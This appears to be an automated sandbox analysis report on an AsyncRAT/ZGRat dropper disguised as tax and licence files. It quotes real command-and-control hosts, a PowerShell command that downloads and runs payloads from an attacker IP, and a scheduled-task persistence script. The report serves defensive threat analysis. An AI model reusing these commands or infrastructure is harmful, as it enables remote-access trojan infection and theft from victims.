Overview
overview
10Static
static
12O22-Tax-Returns.wsf
windows7-x64
102O22-Tax-Returns.wsf
windows10-2004-x64
10DRlVERS-LlCENSE.wsf
windows7-x64
10DRlVERS-LlCENSE.wsf
windows10-2004-x64
10PR0FlT&L0SS_2O23.wsf
windows7-x64
10PR0FlT&L0SS_2O23.wsf
windows10-2004-x64
10ScheduIe-K.wsf
windows7-x64
10ScheduIe-K.wsf
windows10-2004-x64
10Analysis
-
max time kernel
157s -
max time network
161s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
24-01-2024 04:21
Static task
static1
Behavioral task
behavioral1
Sample
2O22-Tax-Returns.wsf
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
2O22-Tax-Returns.wsf
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
DRlVERS-LlCENSE.wsf
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
DRlVERS-LlCENSE.wsf
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
PR0FlT&L0SS_2O23.wsf
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
PR0FlT&L0SS_2O23.wsf
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
ScheduIe-K.wsf
Resource
win7-20231129-en
General
-
Target
ScheduIe-K.wsf
-
Size
4KB
-
MD5
eafa5d2bdb1f8bca65b208d7e6101e1c
-
SHA1
da7085b340e3b02d94bb4acc92ee9475133b7948
-
SHA256
572a90ba88b5424d527785d48667dfd95293469b07ab016970b7253e2bb5d0d0
-
SHA512
2114d0dda32e2224c8253a9ec038b6f212a01082bb73222780391e0842a73097c57454f248135671f67662f419bba9c5cbb7721a1eba6790eb59381e7a4bbda8
-
SSDEEP
96:021JYd1k2ig3AwYx4wg3CWPqrHekw21JYd1k2ig3AwYx4wg3CWPqrHek4:Np2ioAwYgSWPqTeGp2ioAwYgSWPqTeB
Malware Config
Extracted
http://176.107.185.29:666/Rar.jpg
http://176.107.185.29:666/load.rar
Extracted
asyncrat
AWS | 3Losh
BB
icant.theworkpc.com:6606
icant.theworkpc.com:7707
icant.theworkpc.com:8808
icant.theworkpc.com:5550
AsyncMutex_alosh
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Detect ZGRat V1 1 IoCs
Processes:
resource yara_rule behavioral8/memory/1372-101-0x0000017CC8930000-0x0000017CC8982000-memory.dmp family_zgrat_v1 -
Async RAT payload 1 IoCs
Processes:
resource yara_rule behavioral8/memory/3644-102-0x0000000000400000-0x0000000000416000-memory.dmp asyncrat -
Blocklisted process makes network request 1 IoCs
Processes:
WScript.exeflow pid process 2 64 WScript.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exeWScript.exeWScript.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation WScript.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process target process PID 1372 set thread context of 3644 1372 powershell.exe aspnet_compiler.exe PID 4240 set thread context of 4356 4240 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
WScript.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\Local Settings WScript.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepowershell.exeaspnet_compiler.exepowershell.exepid process 2312 powershell.exe 2312 powershell.exe 1372 powershell.exe 1020 powershell.exe 1372 powershell.exe 1020 powershell.exe 3644 aspnet_compiler.exe 4240 powershell.exe 4240 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exeaspnet_compiler.exepowershell.exedescription pid process Token: SeDebugPrivilege 2312 powershell.exe Token: SeDebugPrivilege 1372 powershell.exe Token: SeDebugPrivilege 1020 powershell.exe Token: SeDebugPrivilege 3644 aspnet_compiler.exe Token: SeDebugPrivilege 4240 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
aspnet_compiler.exepid process 3644 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 40 IoCs
Processes:
WScript.execmd.exeWScript.exeWScript.execmd.execmd.exepowershell.exeWScript.execmd.exepowershell.exedescription pid process target process PID 64 wrote to memory of 2312 64 WScript.exe powershell.exe PID 64 wrote to memory of 2312 64 WScript.exe powershell.exe PID 64 wrote to memory of 2784 64 WScript.exe cmd.exe PID 64 wrote to memory of 2784 64 WScript.exe cmd.exe PID 2784 wrote to memory of 4904 2784 cmd.exe Rar.exe PID 2784 wrote to memory of 4904 2784 cmd.exe Rar.exe PID 64 wrote to memory of 4640 64 WScript.exe WScript.exe PID 64 wrote to memory of 4640 64 WScript.exe WScript.exe PID 64 wrote to memory of 2988 64 WScript.exe WScript.exe PID 64 wrote to memory of 2988 64 WScript.exe WScript.exe PID 4640 wrote to memory of 3676 4640 WScript.exe cmd.exe PID 4640 wrote to memory of 3676 4640 WScript.exe cmd.exe PID 2988 wrote to memory of 1688 2988 WScript.exe cmd.exe PID 2988 wrote to memory of 1688 2988 WScript.exe cmd.exe PID 3676 wrote to memory of 2020 3676 cmd.exe wscript.exe PID 3676 wrote to memory of 2020 3676 cmd.exe wscript.exe PID 1688 wrote to memory of 1372 1688 cmd.exe powershell.exe PID 1688 wrote to memory of 1372 1688 cmd.exe powershell.exe PID 3676 wrote to memory of 1020 3676 cmd.exe powershell.exe PID 3676 wrote to memory of 1020 3676 cmd.exe powershell.exe PID 1372 wrote to memory of 3644 1372 powershell.exe aspnet_compiler.exe PID 1372 wrote to memory of 3644 1372 powershell.exe aspnet_compiler.exe PID 1372 wrote to memory of 3644 1372 powershell.exe aspnet_compiler.exe PID 1372 wrote to memory of 3644 1372 powershell.exe aspnet_compiler.exe PID 1372 wrote to memory of 3644 1372 powershell.exe aspnet_compiler.exe PID 1372 wrote to memory of 3644 1372 powershell.exe aspnet_compiler.exe PID 1372 wrote to memory of 3644 1372 powershell.exe aspnet_compiler.exe PID 1372 wrote to memory of 3644 1372 powershell.exe aspnet_compiler.exe PID 1940 wrote to memory of 3212 1940 WScript.exe cmd.exe PID 1940 wrote to memory of 3212 1940 WScript.exe cmd.exe PID 3212 wrote to memory of 4240 3212 cmd.exe powershell.exe PID 3212 wrote to memory of 4240 3212 cmd.exe powershell.exe PID 4240 wrote to memory of 4356 4240 powershell.exe aspnet_compiler.exe PID 4240 wrote to memory of 4356 4240 powershell.exe aspnet_compiler.exe PID 4240 wrote to memory of 4356 4240 powershell.exe aspnet_compiler.exe PID 4240 wrote to memory of 4356 4240 powershell.exe aspnet_compiler.exe PID 4240 wrote to memory of 4356 4240 powershell.exe aspnet_compiler.exe PID 4240 wrote to memory of 4356 4240 powershell.exe aspnet_compiler.exe PID 4240 wrote to memory of 4356 4240 powershell.exe aspnet_compiler.exe PID 4240 wrote to memory of 4356 4240 powershell.exe aspnet_compiler.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ScheduIe-K.wsf"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-BitsTransfer -Source 'http://176.107.185.29:666/Rar.jpg' -Destination 'C:\Users\Public\Rar.exe'; Start-BitsTransfer -Source 'http://176.107.185.29:666/load.rar' -Destination 'C:\Users\Public\load.rar'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Rar.exe x -p111 load.rar2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\Rar.exeRar.exe x -p111 load.rar3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\basta.js"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" C:\Users\Public\"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wscript.exeWScript /B "C:\Users\Public\PowerRun.vbs"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\app.js'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\run.bat" C:\Users\Public\"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\run.ps1"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\run.bat" C:\Users\Public\"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\run.ps1"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD561e2e57471d559f5f6813c0a7995c075
SHA133c621541bc0892ddab1b65345a348c14af566e5
SHA256c1acff9ad0b9cbb4f83f7953ec66d2ac7c37a6fa4a1474430fc1b04ad049231d
SHA5129fb42b4b261b4114d113b7ea96ef33a0bade598332361499b97e5b92b72895f287f753d62d26ad86573ab9f56f1b052d2d4c61a4ccf287ef7d8e1c9363353a5c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5a43ae420831aab8a88da493cff216aed
SHA1ba619ccfc2e869d77a0a508592d17999277f0718
SHA2562a3e28f3c1df947fcef9a9c791632e9bd1a9e97c3838c58912b8e4cb74f3d7a2
SHA512d7da451bc66a4f32a9fc4b8edc8a8c4e89b340c7736f3513c66657efd1e85fa43c30d1a27834044a35c57e714dc35fa97cf3d9922f1773aa781dc7a5095e2f39
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD534b22be6c61a0e89673221e63503e7b9
SHA1aeeb4e71c2de0d1ecdd2714067293d5df54fdcc6
SHA2565042bac471b1d805802849d1095aee7b503450352a246487b8dd56684a2b424a
SHA512930dd2eebbb53e2c6309677c8f4450a4da7dc37642e346ecc97901827224d919fdc9dda8915ef0ffc90275c813543d5dec9aa552730cbe906f84e73404ec88cb
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xuaenaid.dwu.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Public\Execute.txtFilesize
7B
MD540cd014b7b6251e3a22e6a45a73a64e1
SHA16ea36ce8d4940505e9a2c8fea5db868cd8b3d440
SHA256e3a67d9540e9a204f7dc4aa9d44a0ec652856cfa932a21196bf9df23aa0e4cd1
SHA512776d4496cc76782961d66f235ff257567e12e85b950101247fb29de911a4e44048398932f2881b5610cbad6c90fe1c4e99f346cc7d315d7b9a612c89b19b42ea
-
C:\Users\Public\Framework.txtFilesize
520B
MD56a08392ecf95df7fc91917dcfaae8da6
SHA1480f6a5c761e1a069c0d68f5ac2aabf727791393
SHA2560a572ee5508d9310936801a04237d56f118dff4dbaa98f60070988cc4b8ca460
SHA512d70c436183a9c6f6d4ce9296dce846f94cd12d7fbb76b24e59d88a77349a95a7a0d6ad8f9f4ffc32a98618b3250e0d35e4cf9ff1e711f4e63ffee425597dfc5e
-
C:\Users\Public\Gettype.txtFilesize
7B
MD59221b7b54ed96de7281d31f8ae35be6a
SHA1223fad426aa8c753546501b0643ee1720b57bff0
SHA2568eab5c7c6d1116d28014f0da7b7e78b9857da1e6f951b903f2a714fc6d3c790a
SHA512be37de186628a2c30698a6d4826ec5f8845e7b69317b2f044e86fae615c263a5fd179fcbc50821c85b49c9e3e71adb10a947060312da281418c8ca231d656d5d
-
C:\Users\Public\Invoke.txtFilesize
6B
MD55fb833d20ef9f93596f4117a81523536
SHA1d6aa1f3a789f3f3108666e0ac807ca5ca7dc5fa5
SHA256e77f5b9f691679ef6fa67d3ec953199b1696cf6a0e77741c035f11aadfd9bf73
SHA512afaec35da2440502779227d9436570db82e1f5d86c90662eae82564d717407518d4e1181e024566e2d8d6029bd4e738b9ba4a3108753a8d0d0c98934db94ba35
-
C:\Users\Public\NewPE2.txtFilesize
9B
MD58a56a0e23dbfe7a50c5ec927b73ec5f2
SHA1abebd513e68e63e7ec6ae56327c232b6e444ce0a
SHA2563b348b38ac24e5e26423cc6d46936e7a4fdedda9d4aa89fdb2cfde4fad662cc1
SHA512276fc17efa7fef658167a94f22c76ae2abb6768d40702a39f970f196099058139249b8e12f18569f7f42f03f581f2543e49f39ab41553dd38d85511558a77ed2
-
C:\Users\Public\ali1.txtFilesize
46B
MD5fe12f30d0b6d429b98b1d3df92bf59a8
SHA124cffdb45d896b0a8d92281792b235d1664fce96
SHA25617ec93624ff431709003973eaa0f58eed475c7ad3ca2ce4a97a8437a1bd2af93
SHA5125c6740872683bbb04fc6b32eba74162b7ecd3ab91dee38e6c3ed8258e6f2d12759f10b128ff95d39b5c0c6f6fe4f7aee02b544fbcad5809064a02941c3d5cb69
-
C:\Users\Public\ali3.txtFilesize
96B
MD577af28c3475094912f8dc37d929baf1e
SHA14a0811f3eba94bbe7a71390d1c4802cc70fad959
SHA2563f8d9f13ec6706119324a90615c3104494b73d5d4677a3038fdab3feccb4c7fc
SHA51277684adce12bac287f2cab521b3f9a49f5e4a359fa1b07327f4e88f11f44ced7699d82fb8d285d175b071a4bbfc96d480851a9e17c13071b872d357596ad31b7
-
C:\Users\Public\ali4.txtFilesize
33B
MD544c343b055db20c5bdf1da30295b91c6
SHA163f974e8a1c0e8d4364994acdbb74f7b0502316c
SHA25695c9b39a2a50a313fd4cafe36be3b72122c3548e748eb344adc3b37564bd671e
SHA512def9ec591c186080155be93d4dc1916efadd2face7b02551c406f8f19a7364353fa801cb82d07364f1e4d310f0fc707a1dcd2eeb554b1530dc732449362a3b5e
-
C:\Users\Public\app.jsFilesize
429B
MD506596b9b5999102e3eaa3bdcdc1795c5
SHA11cf86cf1f2e8bff0b7598789c716cc72483ae5c4
SHA256e26f0753cf2e2b93e68ef90625e7419be606f5c88ae6b25ae0071d41d7ffc5e3
SHA5125e624331982c2df74d0ac45162ace7dac316abfc625fa6180c134567cf1d2d64b3871aeb7883fe37cb6e0d2cfe82c91b7cbbc0d2b955399a31e964725328c48c
-
C:\Users\Public\basta.jsFilesize
426B
MD5ee434daaffcd151a6fc086a4fc6c0f71
SHA1b6f3b6cb28ad092e8a4e1dff990632d284c9d149
SHA256d2519e1deb05ba1efa82140bc96a8512edfb4482bc888c5c0103a6d78c79d9a3
SHA5127d203e1f1f50cdeb2f576deff3e38b2fa342f997baade2dca3482880e6ecb6daa339f1075368e409e1618e1693761a809434dbe436e389445745d886544aaf19
-
C:\Users\Public\byet.txtFilesize
136KB
MD5e418d273bf326faac5c90872f4286a59
SHA10bd12697fa39ba3962f4cf4fdd394ba9e0570dbe
SHA256d7725fee63bbab6720f8e0ea84b141f92a2a50ae0885ecc1f86502fa9cab5d92
SHA512b7f2e8ea9fc77e4f696c4575f558fd3d2de0877bd94cf41a3847ebe013ed8b8a69a513b218b1d2f4268713c8dfabd66748d452cb2c0cbee713d97c49fe0a0ae5
-
C:\Users\Public\getMethod.txtFilesize
9B
MD5db37f91f128a82062af0f39f649ea122
SHA1f21110ae7ac7cde74e7aa59b22ed10bace35b06b
SHA256e53ba77fa1dbcb1cc3beed1344f6ae7b182d6a2e2a09bb32ec0d4474978e4a32
SHA512681c5c69acba8c2b327afd0bcb1062fb5f6ee3231e6b95f4cd97ecd768879250eb81d36b1e1640554a85002a7b2b099acfe7f59f70884f10afd51d372583d3ae
-
C:\Users\Public\load.txtFilesize
4B
MD5ec4d1eb36b22d19728e9d1d23ca84d1c
SHA15dbc716c4600097b85b9e51d6aeb77a4363b03ed
SHA2560cf67fc72b3c86c7a454f6d86b43ed245a8e491d0e5288d4da8c7ff43a7bcdb0
SHA512d67f0ffb682d7a13510ec5d3e643889d43bc7593429f806fd882b2c72c05a530c2462d332d4293015f33397cdec84c53d1eea58a7bebaab5504153729df02700
-
C:\Users\Public\node.batFilesize
947B
MD5ef7988ba949227574173e69ff8549364
SHA19d444282f69a7dc6b42a4e6ea56f8459433d3691
SHA2569da906ffcb82af673a68966a89fae9339ca74a7837e0f7f6de1afcaaec069099
SHA51244eaa249268e8d0e36832b06e0fc9079e0fa96911cb3a83c11ad9b81154a98a40fe2068a084635abd027c5791123e3098e3ebfd795ea897cb6d9b6be7e872430
-
C:\Users\Public\run.batFilesize
177B
MD50bde649a7aec3a5822f4b0205c90155c
SHA1f3ca91f4eff94d824bd6ec021a4eb99214ee01b8
SHA256ae11f210338d39ca008393d8bbcc9abe12d0b64a6b43c03a883d02a1dc59184f
SHA512cc1ca54a02345ad5bf3e927333b6ae8f3e01b90736a46672027da5d47bb76134b4f05f53c9733930dc9ea444bbf676fecfb228ccc7c6d3c3a8f56a55dd314a4e
-
C:\Users\Public\run.ps1Filesize
1KB
MD5ce8f93f99511bd93b48c973e9e1f6e49
SHA1e81d55b0489ac3ab49b54dc5ee47ec08c992607a
SHA25604acbc5f824af62db5c8253f1d9a00fc359be85192f01b13ac9b5b4a89b6ad53
SHA512b8b495d82927bae7942f06dc99726ba61f47af5ecb91ed5ea01f3c1025ee9bf8dc47db0a659ede05f4373e2d35fada018a44fcc8a9ad79ea0d77f91b9618ec09
-
C:\Users\Public\runpe.txtFilesize
550KB
MD5422a2358165467eb4a4e6b6ebf194f3c
SHA13ba6075a6ac4a34ea8406c7bcd347247579cab7c
SHA25696c1710a2b917504427011ecf283d4e17f8c00d02ae9f8061f53e564336bf9e6
SHA5127e2332b897a333dfe1d24bb7729166241ed9d859c2cf6af0c205fb300a31febae794fddd49cac4a3f5b563c355de26b831e92aee4559677ac7fc3cdd2c67c850
-
memory/1020-73-0x0000019232E00000-0x0000019232E10000-memory.dmpFilesize
64KB
-
memory/1020-71-0x00007FFD789A0000-0x00007FFD79461000-memory.dmpFilesize
10.8MB
-
memory/1020-100-0x00007FFD789A0000-0x00007FFD79461000-memory.dmpFilesize
10.8MB
-
memory/1372-96-0x0000017CE3190000-0x0000017CE3206000-memory.dmpFilesize
472KB
-
memory/1372-72-0x0000017CC8920000-0x0000017CC8930000-memory.dmpFilesize
64KB
-
memory/1372-70-0x0000017CC8920000-0x0000017CC8930000-memory.dmpFilesize
64KB
-
memory/1372-69-0x00007FFD789A0000-0x00007FFD79461000-memory.dmpFilesize
10.8MB
-
memory/1372-84-0x0000017CC8920000-0x0000017CC8930000-memory.dmpFilesize
64KB
-
memory/1372-105-0x00007FFD789A0000-0x00007FFD79461000-memory.dmpFilesize
10.8MB
-
memory/1372-101-0x0000017CC8930000-0x0000017CC8982000-memory.dmpFilesize
328KB
-
memory/2312-20-0x00007FFD79150000-0x00007FFD79C11000-memory.dmpFilesize
10.8MB
-
memory/2312-17-0x000001F9EAF20000-0x000001F9EAF34000-memory.dmpFilesize
80KB
-
memory/2312-13-0x00007FFD79150000-0x00007FFD79C11000-memory.dmpFilesize
10.8MB
-
memory/2312-14-0x000001F9E8AA0000-0x000001F9E8AB0000-memory.dmpFilesize
64KB
-
memory/2312-16-0x000001F9E8A40000-0x000001F9E8A66000-memory.dmpFilesize
152KB
-
memory/2312-15-0x000001F9E8AA0000-0x000001F9E8AB0000-memory.dmpFilesize
64KB
-
memory/2312-8-0x000001F9E89D0000-0x000001F9E89F2000-memory.dmpFilesize
136KB
-
memory/3644-107-0x0000000005040000-0x0000000005050000-memory.dmpFilesize
64KB
-
memory/3644-106-0x00000000747E0000-0x0000000074F90000-memory.dmpFilesize
7.7MB
-
memory/3644-102-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/3644-108-0x0000000005BC0000-0x0000000006164000-memory.dmpFilesize
5.6MB
-
memory/3644-109-0x0000000005810000-0x00000000058A2000-memory.dmpFilesize
584KB
-
memory/3644-110-0x00000000057E0000-0x00000000057EA000-memory.dmpFilesize
40KB
-
memory/3644-113-0x0000000006690000-0x000000000672C000-memory.dmpFilesize
624KB
-
memory/3644-114-0x0000000006730000-0x0000000006796000-memory.dmpFilesize
408KB
-
memory/3644-115-0x00000000747E0000-0x0000000074F90000-memory.dmpFilesize
7.7MB
-
memory/3644-116-0x0000000005040000-0x0000000005050000-memory.dmpFilesize
64KB
-
memory/4240-117-0x00007FFD79090000-0x00007FFD79B51000-memory.dmpFilesize
10.8MB
-
memory/4240-118-0x0000014BF4010000-0x0000014BF4020000-memory.dmpFilesize
64KB
-
memory/4356-130-0x00000000747E0000-0x0000000074F90000-memory.dmpFilesize
7.7MB